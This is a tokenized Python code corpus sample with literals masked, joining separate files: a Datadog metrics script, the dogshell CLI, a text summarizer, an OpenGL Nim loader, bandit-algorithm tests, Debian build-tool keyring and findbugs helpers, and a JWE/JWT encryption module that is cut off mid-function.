<s> import os <EOL> import time <EOL> from datetime import datetime as dt <EOL> from datetime import timedelta as delta <EOL> import math <EOL> from dogapi import dog_http_api as dog <EOL> dog . api_key = os . environ . get ( "<STR_LIT>" ) <EOL> dog . metric ( '<STR_LIT>' , <NUM_LIT> , host = "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> dog . metric ( '<STR_LIT>' , <NUM_LIT> , host = "<STR_LIT>" ) <EOL> now = dt . now ( ) <EOL> points = [ ] <EOL> for i in range ( <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> t = time . mktime ( ( now - delta ( minutes = i ) ) . timetuple ( ) ) <EOL> points . append ( ( t , math . cos ( i ) + <NUM_LIT:1.0> ) ) <EOL> dog . metric ( '<STR_LIT>' , points , host = "<STR_LIT>" ) <EOL> dog . event ( "<STR_LIT>" , "<STR_LIT>" ) </s>
<s> import argparse <EOL> import os <EOL> import pkg_resources as pkg <EOL> import logging <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( logging . CRITICAL ) <EOL> from dogshell . common import DogshellConfig <EOL> from dogshell . comment import CommentClient <EOL> from dogshell . search import SearchClient <EOL> from dogshell . metric import MetricClient <EOL> from dogshell . tag import TagClient <EOL> from dogshell . event import EventClient <EOL> from dogshell . dashboard import DashClient <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' , <EOL> formatter_class = argparse . ArgumentDefaultsHelpFormatter ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> default = os . path . expanduser ( "<STR_LIT>" ) ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> dest = "<STR_LIT>" , default = None ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> dest = "<STR_LIT>" , default = None ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , action = '<STR_LIT>' , const = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , action = '<STR_LIT>' , const = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , <EOL> default = <NUM_LIT:10> , type = int ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:version>' , <EOL> version = '<STR_LIT>' . format ( version = pkg . require ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . version ) ) <EOL> config = DogshellConfig ( ) <EOL> subparsers = parser . add_subparsers ( title = '<STR_LIT>' ) <EOL> CommentClient ( config ) . setup_parser ( subparsers ) <EOL> SearchClient ( config ) . setup_parser ( subparsers ) <EOL> MetricClient ( config ) . setup_parser ( subparsers ) <EOL> TagClient ( config ) . setup_parser ( subparsers ) <EOL> EventClient ( config ) . setup_parser ( subparsers ) <EOL> DashClient ( config ) . setup_parser ( subparsers ) <EOL> args = parser . parse_args ( ) <EOL> config . load ( args . config , args . api_key , args . app_key ) <EOL> args . func ( args ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import nltk . data <EOL> import os <EOL> class Parser : <EOL> def __init__ ( self ) : <EOL> self . ideal = <NUM_LIT> <EOL> self . stopWords = self . getStopWords ( ) <EOL> def getKeywords ( self , text ) : <EOL> text = self . removePunctations ( text ) <EOL> words = self . splitWords ( text ) <EOL> words = self . removeStopWords ( words ) <EOL> uniqueWords = list ( set ( words ) ) <EOL> keywords = [ { '<STR_LIT>' : word , '<STR_LIT:count>' : words . count ( word ) } for word in uniqueWords ] <EOL> keywords = sorted ( keywords , key = lambda x : - x [ '<STR_LIT:count>' ] ) <EOL> return ( keywords , len ( words ) ) <EOL> def getSentenceLengthScore ( self , sentence ) : <EOL> return ( self . ideal - abs ( self . ideal - len ( sentence ) ) ) / self . ideal <EOL> def getSentencePositionScore ( self , i , sentenceCount ) : <EOL> normalized = i / ( sentenceCount * <NUM_LIT:1.0> ) <EOL> if normalized > <NUM_LIT:0> and normalized <= <NUM_LIT:0.1> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT:0.1> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT:0.5> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT:0.5> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT> : <EOL> return <NUM_LIT> <EOL> elif normalized > <NUM_LIT> and normalized <= <NUM_LIT:1.0> : <EOL> return <NUM_LIT> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def getTitleScore ( self , title , sentence ) : <EOL> titleWords = self . removeStopWords ( title ) <EOL> sentenceWords = self . removeStopWords ( sentence ) <EOL> matchedWords = [ word for word in sentenceWords if word in titleWords ] <EOL> return len ( matchedWords ) / ( len ( title ) * <NUM_LIT:1.0> ) <EOL> def splitSentences ( self , text ) : <EOL> tokenizer = nltk . data . load ( '<STR_LIT>' + os . path . dirname ( os . path . abspath ( __file__ ) ) + '<STR_LIT>' ) <EOL> return tokenizer . tokenize ( text ) <EOL> def splitWords ( self , sentence ) : <EOL> return sentence . lower ( ) . split ( ) <EOL> def removePunctations ( self , text ) : <EOL> return '<STR_LIT>' . join ( t for t in text if t . isalnum ( ) or t == '<STR_LIT:U+0020>' ) <EOL> def removeStopWords ( self , words ) : <EOL> return [ word for word in words if word not in self . stopWords ] <EOL> def getStopWords ( self ) : <EOL> with open ( os . path . dirname ( os . path . abspath ( __file__ ) ) + '<STR_LIT>' ) as file : <EOL> words = file . readlines ( ) <EOL> return [ word . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) for word in words ] </s>
<s> from glad . lang . common . loader import BaseLoader <EOL> from glad . lang . nim . loader import LOAD_OPENGL_DLL <EOL> _OPENGL_LOADER = LOAD_OPENGL_DLL % { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } + '''<STR_LIT>''' <EOL> _OPENGL_HAS_EXT_LT3 = '''<STR_LIT>''' <EOL> _OPENGL_HAS_EXT_GTE3 = '''<STR_LIT>''' <EOL> _FIND_VERSION = '''<STR_LIT>''' <EOL> _BEGIN_LOAD = '''<STR_LIT>''' <EOL> class OpenGLNimLoader ( BaseLoader ) : <EOL> def write_header_end ( self , fobj ) : <EOL> pass <EOL> def write_header ( self , fobj ) : <EOL> pass <EOL> def write ( self , fobj ) : <EOL> pass <EOL> def write_begin_load ( self , fobj ) : <EOL> fobj . write ( _BEGIN_LOAD ) <EOL> def write_end_load ( self , fobj ) : <EOL> fobj . write ( '<STR_LIT>' ) <EOL> def write_find_core ( self , fobj ) : <EOL> fobj . write ( _FIND_VERSION ) <EOL> def write_has_ext ( self , fobj , apiversion ) : <EOL> if apiversion . major == <NUM_LIT:1> and apiversion . minor == <NUM_LIT:0> : <EOL> return <EOL> if apiversion . major < <NUM_LIT:3> : <EOL> fobj . write ( _OPENGL_HAS_EXT_LT3 ) <EOL> else : <EOL> fobj . write ( _OPENGL_HAS_EXT_GTE3 ) </s>
<s> import unittest <EOL> from tests . test_utils import makeBandit <EOL> import random <EOL> import sys <EOL> from collections import Counter <EOL> class MonteCarloTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def draw ( self , arm_name ) : <EOL> if random . random ( ) > self . true_arm_probs [ arm_name ] : <EOL> return <NUM_LIT:0.0> <EOL> return <NUM_LIT:1.0> <EOL> def run_algo ( self , bandit , num_sims , horizon ) : <EOL> chosen_arms = [ <NUM_LIT:0.0> for i in range ( num_sims * horizon ) ] <EOL> rewards = [ <NUM_LIT:0.0> for i in range ( num_sims * horizon ) ] <EOL> cumulative_rewards = [ <NUM_LIT:0.0> for i in range ( num_sims * horizon ) ] <EOL> sim_nums = [ <NUM_LIT:0.0> for i in range ( num_sims * horizon ) ] <EOL> times = [ <NUM_LIT:0.0> for i in range ( num_sims * horizon ) ] <EOL> for sim in range ( num_sims ) : <EOL> sim = sim + <NUM_LIT:1> <EOL> for t in range ( horizon ) : <EOL> t = t + <NUM_LIT:1> <EOL> index = ( sim - <NUM_LIT:1> ) * horizon + t - <NUM_LIT:1> <EOL> sim_nums [ index ] = sim <EOL> times [ index ] = t <EOL> chosen_arm = bandit . suggest_arm ( ) <EOL> chosen_arms [ index ] = chosen_arm [ '<STR_LIT:id>' ] <EOL> bandit . pull_arm ( chosen_arm [ '<STR_LIT:id>' ] ) <EOL> reward = self . draw ( chosen_arm [ '<STR_LIT:id>' ] ) <EOL> rewards [ index ] = reward <EOL> if t == <NUM_LIT:1> : <EOL> cumulative_rewards [ index ] = reward <EOL> else : <EOL> cumulative_rewards [ index ] = cumulative_rewards [ index - <NUM_LIT:1> ] + reward <EOL> if reward : <EOL> bandit . reward_arm ( chosen_arm [ '<STR_LIT:id>' ] , reward ) <EOL> return [ sim_nums , times , chosen_arms , rewards , cumulative_rewards ] <EOL> def save_results ( self , results , output_stream ) : <EOL> for sim in range ( len ( results [ <NUM_LIT:0> ] ) ) : <EOL> output_stream . write ( "<STR_LIT:U+0020>" . join ( [ str ( results [ j ] [ sim ] ) for j in range ( len ( results ) ) ] ) + "<STR_LIT:\n>" ) <EOL> sys . stdout . flush ( ) <EOL> class EpsilonGreedyTest ( MonteCarloTest ) : <EOL> bandit_name = '<STR_LIT>' <EOL> true_arm_probs = dict ( green = <NUM_LIT> , blue = <NUM_LIT:0.1> , red = <NUM_LIT:0.1> ) <EOL> def test_bandit ( self ) : <EOL> results = self . run_algo ( makeBandit ( self . bandit_name , epsilon = <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> data = Counter ( results [ <NUM_LIT:2> ] ) <EOL> assert data . most_common ( <NUM_LIT:1> ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] is '<STR_LIT>' <EOL> class SoftmaxTest ( MonteCarloTest ) : <EOL> true_arm_probs = dict ( green = <NUM_LIT> , red = <NUM_LIT> , blue = <NUM_LIT> ) <EOL> def test_bandit ( self ) : <EOL> results = self . run_algo ( makeBandit ( '<STR_LIT>' , tau = <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> data = Counter ( results [ <NUM_LIT:2> ] ) <EOL> assert data . most_common ( <NUM_LIT:1> ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] is '<STR_LIT>' <EOL> class AnnealingSoftmaxTest ( MonteCarloTest ) : <EOL> true_arm_probs = dict ( green = <NUM_LIT> , red = <NUM_LIT> , blue = <NUM_LIT> ) <EOL> def test_bandit ( self ) : <EOL> results = self . run_algo ( makeBandit ( '<STR_LIT>' , tau = <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> data = Counter ( results [ <NUM_LIT:2> ] ) <EOL> assert data . most_common ( <NUM_LIT:1> ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] is '<STR_LIT>' <EOL> class ThompsonBanditTest ( MonteCarloTest ) : <EOL> true_arm_probs = dict ( green = <NUM_LIT> , red = <NUM_LIT> , blue = <NUM_LIT> ) <EOL> def test_bandit ( self ) : <EOL> results = self . run_algo ( makeBandit ( '<STR_LIT>' ) , <NUM_LIT> , <NUM_LIT> ) <EOL> data = Counter ( results [ <NUM_LIT:2> ] ) <EOL> assert data . most_common ( <NUM_LIT:1> ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] is '<STR_LIT>' </s>
<s> from debile . utils . commands import run_command <EOL> from debile . master . orm import Person , Builder <EOL> from base64 import b64decode <EOL> from hashlib import sha1 <EOL> import fcntl <EOL> import os <EOL> def import_pgp ( keyring , keydata ) : <EOL> """<STR_LIT>""" <EOL> out , err , ret = run_command ( [ <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:1>" <EOL> "<STR_LIT>" , "<STR_LIT>" , keyring , <EOL> "<STR_LIT>" <EOL> ] , input = keydata ) <EOL> fingerprint = None <EOL> for line in out . split ( "<STR_LIT:\n>" ) : <EOL> data = line . split ( ) <EOL> if not data or data [ <NUM_LIT:0> ] != "<STR_LIT>" : <EOL> continue <EOL> if data [ <NUM_LIT:1> ] == "<STR_LIT>" : <EOL> fingerprint = data [ <NUM_LIT:3> ] <EOL> break <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return fingerprint <EOL> def import_ssl ( keyring , certdata , cn = None , email = None ) : <EOL> """<STR_LIT>""" <EOL> out , err , ret = run_command ( [ <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" <EOL> ] , input = certdata ) <EOL> fingerprint = None <EOL> subject = None <EOL> for line in out . split ( "<STR_LIT:\n>" ) : <EOL> data = line . split ( "<STR_LIT:=>" , <NUM_LIT:1> ) <EOL> if data [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> fingerprint = data [ <NUM_LIT:1> ] . replace ( '<STR_LIT::>' , '<STR_LIT>' ) <EOL> if data [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> subject = data [ <NUM_LIT:1> ] . split ( '<STR_LIT:/>' ) <EOL> if fingerprint is None or subject is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if ( ( cn and not "<STR_LIT>" . format ( cn = cn ) in subject ) or <EOL> ( email and not "<STR_LIT>" . format ( email = email ) in subject ) ) : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( cn , email , subject ) ) <EOL> keyring = open ( keyring , '<STR_LIT:a>' ) <EOL> fcntl . lockf ( keyring , fcntl . LOCK_EX ) <EOL> keyring . write ( certdata ) <EOL> keyring . close ( ) <EOL> return fingerprint <EOL> def clean_ssl_keyring ( keyring , session ) : <EOL> old = open ( keyring , '<STR_LIT>' ) <EOL> fcntl . lockf ( old , fcntl . LOCK_EX ) <EOL> new = open ( keyring + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> fcntl . lockf ( new , fcntl . LOCK_EX ) <EOL> for line in old : <EOL> if "<STR_LIT>" in line : <EOL> der = b"<STR_LIT>" <EOL> pem = line <EOL> elif "<STR_LIT>" in line : <EOL> pem += line <EOL> fingerprint = sha1 ( der ) . hexdigest ( ) . upper ( ) <EOL> builder = session . query ( Builder ) . filter_by ( ssl = fingerprint ) . first ( ) <EOL> user = session . query ( Person ) . filter_by ( ssl = fingerprint ) . first ( ) <EOL> if builder or user : <EOL> new . write ( pem ) <EOL> else : <EOL> der += b64decode ( line . strip ( ) ) <EOL> pem += line <EOL> new . close ( ) <EOL> os . rename ( keyring + '<STR_LIT>' , keyring ) <EOL> old . close ( ) </s>
<s> from debile . slave . wrappers . findbugs import parse_findbugs <EOL> from debile . slave . utils import cd <EOL> from debile . utils . commands import run_command <EOL> def findbugs ( deb , analysis ) : <EOL> run_command ( [ "<STR_LIT>" , "<STR_LIT>" , deb , "<STR_LIT>" ] ) <EOL> with cd ( '<STR_LIT>' ) : <EOL> out , err , ret = run_command ( [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:.>' <EOL> ] ) <EOL> xmlbytes = out . encode ( "<STR_LIT:utf-8>" ) <EOL> failed = False <EOL> for issue in parse_findbugs ( xmlbytes ) : <EOL> analysis . results . append ( issue ) <EOL> if not failed and issue . severity in [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:error>' , '<STR_LIT>' <EOL> ] : <EOL> failed = True <EOL> return ( analysis , err , failed , None , None ) <EOL> def version ( ) : <EOL> out , err , ret = run_command ( [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] ) <EOL> if ret != <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> name , version = out . split ( "<STR_LIT:U+0020>" ) <EOL> return ( name , version . strip ( ) ) </s>
<s> import json <EOL> import os <EOL> import sys <EOL> from ConfigParser import SafeConfigParser <EOL> from sqlalchemy import create_engine , Text , TypeDecorator <EOL> from sqlalchemy . ext . declarative import declarative_base <EOL> from sqlalchemy . orm import sessionmaker <EOL> def build_db_conn_string ( cfg ) : <EOL> if cfg . get ( "<STR_LIT>" , "<STR_LIT>" ) . lower ( ) == "<STR_LIT>" : <EOL> return "<STR_LIT>" . format ( ** { <EOL> "<STR_LIT>" : cfg . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : cfg . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> } ) <EOL> return "<STR_LIT>" . format ( ** { <EOL> "<STR_LIT>" : cfg . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT:username>" : cfg . get ( "<STR_LIT>" , "<STR_LIT:username>" ) , <EOL> "<STR_LIT:password>" : cfg . get ( "<STR_LIT>" , "<STR_LIT:password>" ) , <EOL> "<STR_LIT:host>" : cfg . get ( "<STR_LIT>" , "<STR_LIT:host>" ) , <EOL> "<STR_LIT>" : cfg . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> } ) <EOL> class JSONSerialized ( TypeDecorator ) : <EOL> impl = Text <EOL> def process_bind_param ( self , value , dialect ) : <EOL> return json . dumps ( value ) <EOL> def process_result_value ( self , value , dialect ) : <EOL> return json . loads ( value ) <EOL> cfg_file = SafeConfigParser ( ) <EOL> path_to_cfg = os . path . dirname ( __file__ ) <EOL> path_to_cfg = os . path . join ( path_to_cfg , "<STR_LIT>" ) <EOL> cfg_file . read ( path_to_cfg ) <EOL> engine = create_engine ( build_db_conn_string ( cfg_file ) ) <EOL> Base = declarative_base ( ) <EOL> Session = sessionmaker ( bind = engine ) <EOL> db = Session ( ) </s>
<s> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> try : <EOL> from cjson import encode as _json_encode , decode as json_decode <EOL> except ImportError : <EOL> logger . warn ( '<STR_LIT>' ) <EOL> from json import loads as json_decode , dumps as _json_encode <EOL> import zlib <EOL> import datetime <EOL> from base64 import urlsafe_b64encode , urlsafe_b64decode <EOL> from collections import OrderedDict , namedtuple <EOL> from copy import deepcopy <EOL> from time import time <EOL> from struct import pack <EOL> from Crypto . Hash import HMAC , SHA256 , SHA384 , SHA512 <EOL> from Crypto . Cipher import PKCS1_OAEP , AES <EOL> from Crypto . PublicKey import RSA <EOL> from Crypto . Random import get_random_bytes <EOL> from Crypto . Signature import PKCS1_v1_5 as PKCS1_v1_5_SIG <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> JWE = namedtuple ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> JWS = namedtuple ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> JWT = namedtuple ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> CLAIM_ISSUER = '<STR_LIT>' <EOL> CLAIM_SUBJECT = '<STR_LIT>' <EOL> CLAIM_AUDIENCE = '<STR_LIT>' <EOL> CLAIM_EXPIRATION_TIME = '<STR_LIT>' <EOL> CLAIM_NOT_BEFORE = '<STR_LIT>' <EOL> CLAIM_ISSUED_AT = '<STR_LIT>' <EOL> CLAIM_JWT_ID = '<STR_LIT>' <EOL> HEADER_ALG = '<STR_LIT>' <EOL> HEADER_ENC = '<STR_LIT>' <EOL> HEADER_ZIP = '<STR_LIT>' <EOL> HEADER_CRIT = '<STR_LIT>' <EOL> _TEMP_VER_KEY = '<STR_LIT>' <EOL> _TEMP_VER = <NUM_LIT:2> <EOL> JWE_REQUIRED_HEADERS = set ( ( HEADER_ALG , HEADER_ENC ) ) <EOL> JWE_UNDERSTOOD_HEADERS = set ( ( HEADER_ALG , HEADER_ENC , HEADER_ZIP , HEADER_CRIT ) ) <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Expired ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class NotYetValid ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def serialize_compact ( jwt ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT:.>' . join ( jwt ) <EOL> def deserialize_compact ( jwt ) : <EOL> """<STR_LIT>""" <EOL> parts = jwt . split ( '<STR_LIT:.>' ) <EOL> if len ( parts ) == <NUM_LIT:3> : <EOL> token_type = JWS <EOL> elif len ( parts ) == <NUM_LIT:5> : <EOL> token_type = JWE <EOL> else : <EOL> raise Error ( '<STR_LIT>' ) <EOL> return token_type ( * parts ) <EOL> def json_encode ( data ) : <EOL> return _json_encode ( <EOL> OrderedDict ( sorted ( data . items ( ) , key = lambda item : item [ <NUM_LIT:0> ] ) ) <EOL> ) <EOL> def _generate_encryption_keys ( alg , rng ) : <EOL> ( _ , key_len ) , _ = JWA [ alg ] <EOL> num_bytes = key_len / <NUM_LIT:8> <EOL> mac_key = rng ( num_bytes ) <EOL> enc_key = rng ( num_bytes ) <EOL> return mac_key , enc_key <EOL> def _parse_encryption_keys ( key , alg ) : <EOL> ( _ , key_len ) , _ = JWA [ alg ] <EOL> num_bytes = key_len / <NUM_LIT:8> <EOL> mac_key = key [ : num_bytes ] <EOL> enc_key = key [ num_bytes : ] <EOL> return mac_key , enc_key <EOL> def _encrypt_key ( cek , jwk , alg ) : <EOL> ( cipher , _ ) , _ = JWA [ alg ] <EOL> return cipher ( cek , jwk ) <EOL> def _decrypt_key ( encrypted_key , jwk , alg ) : <EOL> ( _ , decipher ) , _ = JWA [ alg ] <EOL> return decipher ( encrypted_key , jwk ) <EOL> def _generate_iv ( enc , rng ) : <EOL> return rng ( AES . block_size ) <EOL> def _generate_authentication_tag ( key , protected_header , ciphertext , iv , alg ) : <EOL> aad = b64encode_url ( protected_header ) <EOL> _ , ( ( cipher , _ ) , mod ) = JWA [ alg ] <EOL> al = pack ( "<STR_LIT>" , <NUM_LIT:8> * len ( aad ) ) <EOL> chunks = ( aad , iv , ciphertext , al ) <EOL> return cipher ( chunks , key , mod ) [ : len ( key ) ] <EOL> def _verify_header ( header ) : <EOL> for key in JWE_REQUIRED_HEADERS : <EOL> if key not in header : <EOL> return False <EOL> if HEADER_CRIT in header : <EOL> for crit in header [ HEADER_CRIT ] : <EOL> if crit not in JWE_UNDERSTOOD_HEADERS : <EOL> return False <EOL> return True <EOL> def encrypt ( claims , jwk , adata = '<STR_LIT>' , add_header = None , alg = '<STR_LIT>' , <EOL> enc = '<STR_LIT>' , rng = get_random_bytes , compression = None ) : <EOL> """<STR_LIT>""" <EOL> claims = deepcopy ( claims ) <EOL> assert _TEMP_VER_KEY not in claims <EOL> claims [ _TEMP_VER_KEY ] = _TEMP_VER <EOL> header = dict ( ( add_header or { } ) . items ( ) + [ <EOL> ( HEADER_ENC , enc ) , ( HEADER_ALG , alg ) ] ) <EOL> assert _TEMP_VER_KEY not in header <EOL> header [ _TEMP_VER_KEY ] = claims [ _TEMP_VER_KEY ] <EOL> plaintext = json_encode ( claims ) <EOL> if compression is not None : <EOL> header [ HEADER_ZIP ] = compression <EOL> try : <EOL> ( compress , _ ) = COMPRESSION [ compression ] <EOL> except KeyError : <EOL> raise Error ( <EOL> '<STR_LIT>' . format ( compression ) ) <EOL> plaintext = compress ( plaintext ) <EOL> ( ( cipher , _ ) , key_size ) , ( ( hash_fn , _ ) , hash_mod ) = JWA [ enc ] <EOL> iv = rng ( AES . block_size ) <EOL> encryption_key = rng ( hash_mod . digest_size ) <EOL> ciphertext = cipher ( plaintext , encryption_key [ - hash_mod . digest_size / <NUM_LIT:2> : ] , iv ) <EOL> hash = hash_fn ( _jwe_hash_str ( ciphertext , iv , adata ) , <EOL> encryption_key [ : - hash_mod . digest_size / <NUM_LIT:2> ] , hash_mod ) <EOL> ( cipher , _ ) , _ = JWA [ alg ] <EOL> encryption_key_ciphertext = cipher ( encryption_key , jwk ) <EOL> return JWE ( * map ( b64encode_url , <EOL> ( json_encode ( header ) , <EOL> encryption_key_ciphertext , <EOL> iv , <EOL> ciphertext , <EOL> auth_tag ( hash ) ) ) ) <EOL> def spec_compliant_encrypt ( claims , jwk , add_header = None , alg = '<STR_LIT>' , <EOL> enc = '<STR_LIT>' , rng = get_random_bytes ) : <EOL> """<STR_LIT>""" <EOL> header = dict ( ( add_header or { } ) . items ( ) + [ ( HEADER_ENC , enc ) , <EOL> ( HEADER_ALG , alg ) ] ) <EOL> protected_header = json_encode ( header ) <EOL> mac_key , enc_key = _generate_encryption_keys ( enc , rng ) <EOL> encrypted_key = _encrypt_key ( mac_key + enc_key , jwk , alg ) <EOL> iv = _generate_iv ( enc , rng ) <EOL> plaintext = json_encode ( claims ) <EOL> if HEADER_ZIP in header : <EOL> try : <EOL> ( compression_func , _ ) = COMPRESSION [ header [ HEADER_ZIP ] ] <EOL> except KeyError : <EOL> raise Error ( <EOL> '<STR_LIT>' . format ( header [ HEADER_ZIP ] ) ) <EOL> M = compression_func ( plaintext ) <EOL> else : <EOL> M = plaintext <EOL> ( ( cipher , _ ) , key_len ) , _ = JWA [ enc ] <EOL> ciphertext = cipher ( M , enc_key , iv ) <EOL> authentication_tag = _generate_authentication_tag ( <EOL> mac_key , protected_header , ciphertext , iv , enc <EOL> ) <EOL> return JWE ( <EOL> * map ( <EOL> b64encode_url , <EOL> ( protected_header , encrypted_key , iv , ciphertext , <EOL> authentication_tag ) <EOL> ) <EOL> ) <EOL> def legacy_decrypt ( jwe , jwk , adata = '<STR_LIT>' , validate_claims = True , <EOL> expiry_seconds = None ) : <EOL> """<STR_LIT>""" <EOL> protected_header , encrypted_key , iv , ciphertext , authentication_tag = map ( <EOL> b64decode_url , jwe ) <EOL> header = json_decode ( protected_header ) <EOL> alg = header [ HEADER_ALG ] <EOL> enc = header [ HEADER_ENC ] <EOL> encryption_key = _decrypt_key ( encrypted_key , jwk , alg ) <EOL> ( ( _ , decipher ) , _ ) , ( ( hash_fn , _ ) , mod ) = JWA [ enc ] <EOL> version = header . get ( _TEMP_VER_KEY ) <EOL> if version : <EOL> plaintext = decipher ( ciphertext , encryption_key [ - mod . digest_size / <NUM_LIT:2> : ] , <EOL> iv ) <EOL> hash = hash_fn ( _jwe_hash_str ( ciphertext , iv , adata , version ) , <EOL> encryption_key [ : - mod . digest_size / <NUM_LIT:2> ] , mod = mod ) <EOL> else : <EOL> plaintext = decipher ( ciphertext , encryption_key [ : - mod . digest_size ] , iv ) <EOL> hash = hash_fn ( _jwe_hash_str ( ciphertext , iv , adata , version ) , <EOL> encryption_key [ - mod . digest_size : ] , mod = mod ) <EOL> if not const_compare ( auth_tag ( hash ) , authentication_tag ) : <EOL> raise Error ( '<STR_LIT>' ) <EOL> if HEADER_ZIP in header : <EOL> try : <EOL> ( _ , decompress ) = COMPRESSION [ header [ HEADER_ZIP ] ] <EOL> except KeyError : <EOL> raise Error ( '<STR_LIT>' . format ( <EOL> header [ HEADER_ZIP ] ) ) <EOL> plaintext = decompress ( plaintext ) <EOL> claims = json_decode ( plaintext ) <EOL> try : <EOL> del claims [ _TEMP_VER_KEY ] <EOL> except KeyError : <EOL> pass <EOL> _validate ( claims , validate_claims , expiry_seconds ) <EOL> return JWT ( header , claims ) <EOL> def spec_compliant_decrypt ( jwe , jwk , validate_claims = True , <EOL> expiry_seconds = None ) : <EOL> """<STR_LIT>""" <EOL> protected_header , encrypted_key , iv , ciphertext , authentication_tag = map ( <EOL> b64decode_url , jwe <EOL> ) <EOL> header = json_decode ( protected_header ) <EOL> if not _verify_header ( header ) : <EOL> raise Error ( '<STR_LIT>' ) <EOL> alg = header [ HEADER_ALG ] <EOL> enc = header [ HEADER_ENC ] <EOL> encryption_key = _decrypt_key ( encrypted_key , jwk , alg ) <EOL> mac_key , enc_key = _parse_encryption_keys ( encryption_key , enc ) <EOL> expected_tag = _generate_authentication_tag ( <EOL> mac_key , json_encode ( header ) , ciphertext , iv , enc <EOL> ) <EOL> if not const_compare ( expected_tag , authentication_tag ) : <EOL> raise Error ( '<STR_LIT>' ) <EOL> ( ( _ , decipher ) , _ ) , _ = JWA [ enc ] <EOL> M = decipher ( ciphertext , enc_key , iv ) <EOL> if HEADER_ZIP in header : <EOL> try : <EOL> ( _ , decompress ) = COMPRESSION [ header [ HEADER_ZIP ] ] <EOL> except KeyError : <EOL> raise Error ( '<STR_LIT>' . format ( <EOL> header [ HEADER_ZIP ] ) ) <EOL> plaintext = decompress ( M ) <EOL> else : <EOL> plaintext = M <EOL> claims = json_decode ( plaintext ) <EOL> _validate ( claims , validate_claims , expiry_seconds ) <EOL> return JWT ( header , claims ) <EOL> def decrypt ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return legacy_decrypt ( * args , ** kwargs ) <EOL> except ( Error , ValueError ) as e : <EOL> return spec_compliant_decrypt ( * args , ** kwargs ) <EOL> def sign ( claims , jwk , add_header = None , alg = '<STR_LIT>' ) : <EOL> 